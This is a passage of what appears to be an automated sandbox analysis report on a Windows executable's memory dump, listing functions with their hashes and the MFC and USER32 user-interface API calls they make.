Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #609$#641H_prolog
String ID:
API String ID: 4017314284-0
Opcode ID: 4a85dc29953cf11a30934211187502ded2d803dfc5fb7a842ffe546525190f25
Instruction ID: ee170eabb039e57bda6be525a15d9191eea479020e5cb6608ab4567baf00bf26
Opcode Fuzzy Hash: 4a85dc29953cf11a30934211187502ded2d803dfc5fb7a842ffe546525190f25
Instruction Fuzzy Hash: 9E01B130A017A5DAD715EBA5E0113DDBBA0AF19308F81448EE89613292CFB92B08C656

Uniqueness

Uniqueness Score: -1.00%

Function 00415224, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415229
GetDC.USER32(?), ref: 00415241
#2859.MFC42(00000000), ref: 00415248
ReleaseDC.USER32 ref: 0041529B
#2414.MFC42(?,?,0042E34C), ref: 004152C6

Strings

LB, xrefs: 00415270
LB, xrefs: 00415277

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#2859H_prologRelease
String ID: LB$LB
API String ID: 629481640-4028575280
Opcode ID: cee607380c68ba98a6eaebae186a6dd5c0ab91585a9cdd5785c49cb2be72b3f8
Instruction ID: 4c7252ae07c7c43de2499c44178c2170a3b2f08b20b7865d226cb0f498e161cd
Opcode Fuzzy Hash: cee607380c68ba98a6eaebae186a6dd5c0ab91585a9cdd5785c49cb2be72b3f8
Instruction Fuzzy Hash: A9219076A0011AEFDB01EF90D845EBFBBB5FF48308F10412AF905A3220D7349954DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401F4B, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041DC70
#298.MFC42 ref: 0041DC7E
#540.MFC42 ref: 0041DCA3
#860.MFC42(default), ref: 0041DCD1
GetSysColor.USER32(0000000C), ref: 0041DCE1
GetSysColor.USER32(00000016), ref: 0041DCEB

Strings

default, xrefs: 0041DCC0

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#298#540#860H_prolog
String ID: default
API String ID: 4103304394-3814588639
Opcode ID: 8e090dce3348cc4243f4f969f8294fa709340f522849a1016f9a1d0edc50213f
Instruction ID: 453a261d627ba88643f5e50c72a84d9de0ce84cc8cc6b22033729132a934df02
Opcode Fuzzy Hash: 8e090dce3348cc4243f4f969f8294fa709340f522849a1016f9a1d0edc50213f
Instruction Fuzzy Hash: 93119AB1A007509ED710DF6AD841B9AFBE0FF88304F91882FD54ADB341D7B8A904CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00401177, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004204F0
#1168.MFC42 ref: 004204FD
#537.MFC42(CInstanceChecker_MMF_), ref: 0042050D
#941.MFC42(?,CInstanceChecker_MMF_), ref: 0042051C
#535.MFC42(?,?,CInstanceChecker_MMF_), ref: 00420528
#800.MFC42(?,?,CInstanceChecker_MMF_), ref: 00420537

Strings

CInstanceChecker_MMF_, xrefs: 00420505

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#535#537#800#941H_prolog
String ID: CInstanceChecker_MMF_
API String ID: 245653172-146774202
Opcode ID: aaa0718c1c03cc9cf4a071a7cf5c62624e363ccac82913c361582fb7333b2c36
Instruction ID: 8e4051cf7ab0d0749c3b7cfa97545f7cec281e9dc4ac9cf9f97d19a9e6fe5229
Opcode Fuzzy Hash: aaa0718c1c03cc9cf4a071a7cf5c62624e363ccac82913c361582fb7333b2c36
Instruction Fuzzy Hash: 14F0AF31A10528ABCB04EF81E852BEEB774EF40318F50401FF00167182CB786A05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004016B3, Relevance: 12.2, APIs: 8, Instructions: 235COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00425498
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254B7
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254E2
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 004254FD
??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004255AE
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 004255C9
#825.MFC42(?), ref: 00425704
??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 0042571F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockit@std@@$??0_??1_$#825H_prolog
String ID:
API String ID: 741266746-0
Opcode ID: d3de3422e4da1f999129699302c6b2675a9bce95afd0fe49a15511ca9dbdaf5f
Instruction ID: 0084ec15d44f77e6c7c7fa0f9e1be74a8dc5bb486ee7b904dfb43b366d4907d5
Opcode Fuzzy Hash: d3de3422e4da1f999129699302c6b2675a9bce95afd0fe49a15511ca9dbdaf5f
Instruction Fuzzy Hash: D8B12974A01A11DFCB14CF44E18496ABBF2FF48315BA084AEE45A9B361D734ED81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414D36, Relevance: 12.2, APIs: 8, Instructions: 170windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414D3B
#823.MFC42(00000024,?,?), ref: 00414DA1
#5860.MFC42(?,00000000,?,?), ref: 00414DC0
#384.MFC42(?,00000000,?,?), ref: 00414DE8
#2408.MFC42(?,00000000,?,?), ref: 00414E0C
#2096.MFC42(000000FF,00000001,00000001,?,00000000,?,?), ref: 00414E2C
#686.MFC42(000000FF,00000001,00000001,?,00000000,?,?), ref: 00414E5E
ModifyMenuA.USER32(000000FF,000000FF,?,000000FF,00000000), ref: 00414EFF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2096#2408#384#5860#686#823H_prologMenuModify
String ID:
API String ID: 2291920866-0
Opcode ID: c8f7ebba6118794fe69bd4087835911a34793768d8bb139ebd42fec302dfa275
Instruction ID: a8dd3215eb0e786aec04ccf086e4943d1e7fa13082ca9f15689b160b6166dae2
Opcode Fuzzy Hash: c8f7ebba6118794fe69bd4087835911a34793768d8bb139ebd42fec302dfa275
Instruction Fuzzy Hash: AE616B70A0020AEFCF24DFA5D8819EEBBB5FF44314F54862FE525A7290D7389A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040229D, Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

APIs

#2642.MFC42(00000000), ref: 00422972
#6215.MFC42(00000000,00000000), ref: 0042297C
#2642.MFC42(00000000), ref: 0042298D
#6215.MFC42(00000005,00000000), ref: 00422997
#5981.MFC42(00000005,00000000), ref: 0042299F
GetParent.USER32(?), ref: 004229D8
#2864.MFC42(00000000), ref: 004229DF
#4083.MFC42(00000000), ref: 004229F2

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#6215$#2864#4083#5981Parent
String ID:
API String ID: 4106181681-0
Opcode ID: e2f2a4d83141503f6fd03ad0a3285f52e3282a81c56a9b1b1ee7845cdfd56961
Instruction ID: 3add0e21ccb99a9d43c98b61573d049675cc4a78bf34853b7fc1bef2df387b18
Opcode Fuzzy Hash: e2f2a4d83141503f6fd03ad0a3285f52e3282a81c56a9b1b1ee7845cdfd56961
Instruction Fuzzy Hash: 8831C971300611BBC724EF70A985B17B295BF44310F90892FE55697691CBB8DC50C768

Uniqueness

Uniqueness Score: -1.00%

Function 0041286B, Relevance: 12.1, APIs: 8, Instructions: 98COMMON

Download Yara Rule

APIs

#5606.MFC42(?,00000001), ref: 00412894
#5606.MFC42(?,00000001), ref: 004128C4
#2863.MFC42(?), ref: 004128D2
#4083.MFC42(0042E498,?), ref: 004128E0
#6142.MFC42(00000000,000000FF), ref: 004128FF
#825.MFC42(00442198,00000000,000000FF), ref: 0041291F
#6142.MFC42(00000000,000000FF,00000000,000000FF), ref: 00412932
#2438.MFC42(00000000,000000FF,00000000,000000FF), ref: 00412953

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5606#6142$#2438#2863#4083#825
String ID:
API String ID: 4140221637-0
Opcode ID: 43aca5e0f9e18fc7ff98fa96a33f1708f3bb6313ea317e2c519d746cdf7ed88f
Instruction ID: 38e430417ed99fff2aec973af0616311b3f2024194a5559d53d7cec8d2bbe1ef
Opcode Fuzzy Hash: 43aca5e0f9e18fc7ff98fa96a33f1708f3bb6313ea317e2c519d746cdf7ed88f
Instruction Fuzzy Hash: 4031D7353006205FCA24EB09D580FAAB3A2EFC5714F55061FF956DB291CBA9BC95C718

Uniqueness

Uniqueness Score: -1.00%

Function 0040F6C9, Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 0040F71A
GetSysColor.USER32(00000010), ref: 0040F764
GetSysColor.USER32(00000014), ref: 0040F769
#2567.MFC42(?,00000000), ref: 0040F773
OffsetRect.USER32(?,00000000,-00000003), ref: 0040F790
GetSysColor.USER32(00000010), ref: 0040F798
GetSysColor.USER32(00000014), ref: 0040F79D
#2567.MFC42(?,00000000), ref: 0040F7A7

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2567Rect$InflateOffset
String ID:
API String ID: 225065167-0
Opcode ID: 09b4b30d175552a6a9b28c1bcd3a84ae72c041a889d9dc8c1bd146ce20cb96bf
Instruction ID: baa82c5226399619783ed2a17d0d5022a568870e24018bd6d1aa7922ede4dea4
Opcode Fuzzy Hash: 09b4b30d175552a6a9b28c1bcd3a84ae72c041a889d9dc8c1bd146ce20cb96bf
Instruction Fuzzy Hash: 2B312C76A0011DABCF10DFA8CC45AEEBBB9AF45310F04453AF915EB291D77495048BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00422A18, Relevance: 12.1, APIs: 8, Instructions: 90COMMON

Download Yara Rule

APIs

#4083.MFC42 ref: 00422A2D
#5852.MFC42(?,00000001), ref: 00422A3C
#4083.MFC42 ref: 00422A4E
#3481.MFC42(?,00000000), ref: 00422A7C
#4123.MFC42(?,00000000), ref: 00422A85
#3481.MFC42(00000000,00000000), ref: 00422AB5
#5852.MFC42(00000000,00000001), ref: 00422AC0
#4083.MFC42(0042F1E0), ref: 00422AD5

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4083$#3481#5852$#4123
String ID:
API String ID: 2997837127-0
Opcode ID: c5f6ba48d8ca6c2cf1cc391c2d91167325d5fe0689ce94162d69208071384b44
Instruction ID: 8f8de46666eb49bf20dcb3f9335b27b6f36b01a10a427e1f02f42ab12be10d24
Opcode Fuzzy Hash: c5f6ba48d8ca6c2cf1cc391c2d91167325d5fe0689ce94162d69208071384b44
Instruction Fuzzy Hash: E121D530300520BBCB31AB26AE51A6F77A9AFC4740B90442FF84697691DEB8DD41DB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00415357, Relevance: 12.1, APIs: 8, Instructions: 87COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041535C
#539.MFC42(?), ref: 0041536E

Part of subcall function 00401A64: GetMenuItemCount.USER32 ref: 0041589A
Part of subcall function 00401A64: GetSubMenu.USER32 ref: 004158A4
Part of subcall function 00401A64: #2863.MFC42(00000000), ref: 004158AB
Part of subcall function 00401A64: GetMenuItemCount.USER32 ref: 004158F7

#2408.MFC42(?,?), ref: 004153B9
#823.MFC42(00000008,?,?), ref: 004153C2
#384.MFC42(?,?), ref: 004153D5
#2096.MFC42(000000FF,00000001,00000001,?,?), ref: 004153FC
#2408.MFC42(000000FF,00000001,00000001,?,?), ref: 00415414
#800.MFC42(?), ref: 00415441

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2408CountItem$#2096#2863#384#539#800#823H_prolog
String ID:
API String ID: 2252731133-0
Opcode ID: 42b41ac201261c7f00718324c81c6631226223ba562c79d179f4fcfba59a4e58
Instruction ID: ce0e6e9cc929e7511650859b5746510ee2860919f63265505e5037ca4bfda0b0
Opcode Fuzzy Hash: 42b41ac201261c7f00718324c81c6631226223ba562c79d179f4fcfba59a4e58
Instruction Fuzzy Hash: 6831D531600B14DFCB24DF65D841AEEBBB1EF44314F50862FE566976E0C7749981CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040142E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041DF91
SetRectEmpty.USER32(?), ref: 0041DFA1
#1716.MFC42(?,?), ref: 0041DFB0
#289.MFC42(?,?,?), ref: 0041DFD1
#5787.MFC42(?,?,?,?), ref: 0041DFE4
DrawTextA.USER32(?,?,000000FF,00000000,00002610), ref: 0041E000
#5787.MFC42(00000000,?,?,?), ref: 0041E00E
#613.MFC42(?,?,?), ref: 0041E01A

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5787$#1716#289#613DrawEmptyH_prologRectText
String ID:
API String ID: 1509762740-0
Opcode ID: 3ead366b0e94e5f576af61d423a2feb249b86c45187618b18bb597514f4f47e9
Instruction ID: c2cb669813e9365de1b0dddebe666933175c197f38cd134da9f0e21e4689c7d8
Opcode Fuzzy Hash: 3ead366b0e94e5f576af61d423a2feb249b86c45187618b18bb597514f4f47e9
Instruction Fuzzy Hash: DA21E072D00219DFCB15DFA5D885BEEB7B4FF04324F11851AE42267290DB78AA15CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0A, Relevance: 12.1, APIs: 8, Instructions: 54COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B92B

Part of subcall function 00401861: #327.MFC42 ref: 0041BFCD

#567.MFC42 ref: 0040B94A
#567.MFC42 ref: 0040B961
#567.MFC42 ref: 0040B979
#567.MFC42 ref: 0040B990
#567.MFC42 ref: 0040B9A3
#567.MFC42 ref: 0040B9BA
#1168.MFC42 ref: 0040B9CF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$#1168#327H_prolog
String ID:
API String ID: 170554494-0
Opcode ID: 1df71bec26e165d52fe4d40650e31277f9e4f1d3c30b9f48fb43829753b1fb46
Instruction ID: 27aedc0bfef3dcda90424283e80e9290366841d00c706830cc4b8f6358bd0ee9
Opcode Fuzzy Hash: 1df71bec26e165d52fe4d40650e31277f9e4f1d3c30b9f48fb43829753b1fb46
Instruction Fuzzy Hash: 5521A2B07003A4CBCB11DF69E2813DEBBE1AF84308F51846ED4466B342DBB91A08DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00414BDC, Relevance: 10.6, APIs: 7, Instructions: 97windowCOMMON

Download Yara Rule

APIs

#5860.MFC42(00000000), ref: 00414C49
#3986.MFC42(?,00000000,00000001,00000000), ref: 00414C57
GetMenuItemCount.USER32 ref: 00414C64
#823.MFC42(00000024), ref: 00414C6E
#3986.MFC42(?,00000000,00000001), ref: 00414C8C
#2408.MFC42(?,?,00000000,00000001), ref: 00414CB0
InsertMenuA.USER32(000000FF,?,00000010,00000000,00000000), ref: 00414CDF

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
